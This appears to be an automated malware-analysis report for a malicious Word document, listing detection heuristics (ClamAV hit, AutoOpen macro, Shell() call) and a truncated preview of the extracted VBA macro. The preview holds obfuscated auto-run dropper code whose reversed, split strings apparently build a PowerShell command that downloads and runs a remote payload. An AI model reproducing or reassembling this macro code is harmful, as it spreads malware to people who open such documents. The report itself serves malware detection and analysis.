MALICIOUS
242
Risk Score
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24009 bytes |
SHA-256: 65e4717db24ffe0ff3b45f444e749045049464adb6f844258311a0470b11d997 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "fTMzuncvU"
Sub AutoOpen()
On Error Resume Next
nLvjEMRFY = hdHoSfVOBrIK - IsauLti / (3917045 + tjDNbaAOinwC - 4023448 + SOqBOZpkdcImr)
dSFMqQzjX = EDuOnNVMAnAH - VrTusJFaFpj / (4440474 + YbHmUIudlzULBX - 1715485 + HzqVmkUXW)
HZRKzOLrr = uEOSsNBjuwjql - JwqsBJnGkPNicT / (7396354 + JTKiOMsjzIkA - 4914212 + mRoUAAYSph)
Application.Run "HwkTnBLf", qUUcDXczYFwhC
AnTwFKkiz = pPjDizGJ - tYnhLdwuITlKqi / (5441825 + bttbnYCDNiXk - 7145958 + DuOXwJNGHVJQ)
bOLBzlDVG = NiHUWjT - GLJVQrwTiTT / (4126528 + XRXwnrLjljPj - 9871583 + fQbndmiPwGGw)
End Sub
Function qUUcDXczYFwhC()
On Error Resume Next
JFNfiiupLpK = azTBRuWX - hdMtUVMLUVP / (6272366 + FiwtsuEhQMqjsa - 6306553 + UjNjFMmWb)
ibYPww = jEfOXRdfulD - BbSsRQWMcu / (6054655 + zmBzotvcSMNzBB - 7850936 + DMjvLwhmQM)
XviHf = VzPDmZiOlPjrAp - FpNTqPbwIPN / (6985825 + DEPhbzZcDIba - 3628744 + DKXVjFkrrYwW)
zwZYEQuMkzM = jUBCRrisj + Mid(StrReverse("XtUXqKabAjHbWi+gawyXr'+'KrzkFucsPEcbvKj"), 16, 10)
bmWwXbNlk = DPwBhltXc - mluhfBLNrk / (1132595 + fZwUDlWbW - 1912944 + GcpmpKmDwD)
mRWJk = QVtqJuATIO - lkYFMiHB / (261587 + cMnEpPW - 505743 + jHOKJba)
odCMzORk = bbaDBKzr - NkzDwwC / (3846768 + IGlUfiQEhBXZP - 5701545 + VjaazbCqNkBl)
QXjuztL = uDGoYowLjAw + Mid(StrReverse("fKaWaWLjwaQhtXCnAvZhKRAZwniregaw+gaw'+'tagaw+gawc-sgaw+g'+'awsgaw+gawibBaX+BaXmi//:pt'+'th?/EWlTN/mga'+'w+gawoc.aiiiGUjXh"), 8, 90)
JnCvdDRA = bHwwnwdvUf - GLiPWbWLGPYjds / (2244805 + wqLjuKS - 8940164 + idKiYutEDi)
iodcIsmQORc = SUokUJMECXSEbt - FJwEwsnrswL / (6336119 + VfiaNRkcBaPk - 9629042 + rBLZjlsok)
ziEYBcDT = wiBfdwlI - fiXsrqJJEEi / (6382553 + wiwpjZcvoj - 9020736 + biQFwEoGHS)
rsmHflCOwlb = AkLMqVS + Mid(StrReverse("GKqqGWvJSwvIrRvuuwTshgRzP+RzPa'+'w+gaw4.'+'cfRzP+'+'RzPsaygaw+gawRzP+RzPXrgaw+gaw(gaw+gaw'+'sgaw+gawh4gaw+ga'+'weRzP+RzPlILZIFR'+'zP+RzP'+'gaw+gawdaOILZlnWILZoDRz'+'P+RzPsgaw+g'+'awBaX+BaXh4.gaw+gawUYYyamfjnuUtNMswnfoTdKlIT"), 22, 184)
JVkMQTuwUA = XinQMjjqCcWP - sDFztaMf / (9755066 + hMrCTAwsvzt - 8760242 + LocaacdrmE)
WGKCkpm = jYjkJASFYG - DVdNqFk / (5160787 + SzhuLQAlC - 4147682 + uHVWvQMjuioV)
TJdTIa = EkGwNlXGL - DhqpYsAhCCVL / (9243606 + HSZtAjo - 5786284 + RpaKDXQwiiV)
hNHhWI = TIUiZcokCbi + Mid(StrReverse("dhswTVZClpgaw+gaw.gnigagaw+gawtsgaw+gaw-sgaw'+'+gawda/gawBaX+BaX'+'+gaw'+'/gaRzP+RzPw+gaw:p'+'tgaw+gawth?/CBaX+BaX1Sgaw+gawjT"), 3, 115)
bYiADtkkLI = toFpvMdGfzZCZA - hwKmErcajSNwGI / (7251161 + sLXvlENbEUXDX - 8473782 + fboKzmzNCQOW)
IVTfFw = hNWztFjrBE - ciihjTZC / (8258579 + iXRwnFtzVfX - 6508630 + uqzZJRLudWchP)
WFzLnalm = RiirLfr - qFzGAmtjZpusoq / (7284871 + PlfkEApRYCcTmn - 2365201 + wvAsaDR)
VDrRN = pEbnruwlS + Mid(StrReverse("kllugawtVIC+BaX+BaXgaw+'+'gaBaX+BaXwVgaw+BaX+RzP+RzP'+'B'+'aXgawIgaw+'+'g'+'awCgBaX+BaXaw+gawcgaw+gawegaw+'+'gawjbo'+'-wVIC+V'+'gaw+gawICegaw+'+'gawVIC+VIBaX+'wTHDrbXzAwjjkXAzGFBvfRiDLz"), 27, 155)
RNoVUw = aAGupPihzKZ - lctttqtUMTHjHC / (456517 + CmCbwMmBrAK - 5560744 + WTOcDMKtcWjzU)
dHBfQlk = GtXmnNDfK - wvYqrCsj / (3147059 + qAsHDqrlZQS - 5427724 + zjIUNXPorIG)
mTIJIAfPz = InTBadDirZG - QjwVRFu / (7931167 + RbKjhiIAnz - 8324909 + dvCXjwnPtmYZ)
bPuSboYC = BzznmWPaso + Mid(StrReverse("OiCoWXXrzhhgawIgaw+gBaX+BaXawC(&;)CDSyXr ,gaw+gaw)(gaw+gawshgaw+RzP+RzPgaw4RzP+Rz'+'PgNIgaw+gawLZgaBaX+BaXw+gawiILZrgaw+gawtSga'+'w+gawoNnMRUndC"), 9, 125)
GdosREmtUTd = qMJSszuh - aONmnuz / (6544815 + HZcfCkbd - 9908477 + GRNcVWEqORGn)
fljwo = LiwKtRrjwo - HriLJYrPzMb / (7393965 + msQjEiQA - 3738826 + RwEZhLI)
rnswJrj = JciVirs - pZqnIkvlYBB / (1568303 + NXinmNOEzJE - 8361922 + RJdQOZqX)
EUsHPi = EiauWlOR + Mid(StrReverse("PnNivJovuotbT)'x'+]5[CIlbUP:vne$+]31[ciLbUp:Vne$ ( & |)42qCPZzzzHfbIRj"), 14, 44)
jqSuUQvYiFa = hrdibqQ - wwSmIHncRFUj / (3816357 + qjOlwdur - 7302091 + EZjWvMvDaY)
FszdD = zOOKtthiTbYk - AwPpsmrFMw / (6514770 + YQjFJ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.